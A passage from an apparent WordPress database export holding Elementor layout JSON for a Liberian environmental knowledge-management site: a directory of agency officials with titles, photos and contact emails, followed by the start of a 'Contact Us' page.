\\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23536,3425,'_elementor_edit_mode','builder'),(23537,3425,'_elementor_template_type','wp-page'),(23538,3425,'_elementor_version','3.0.16'),(23539,3425,'_wp_page_template','default'),(23540,3425,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 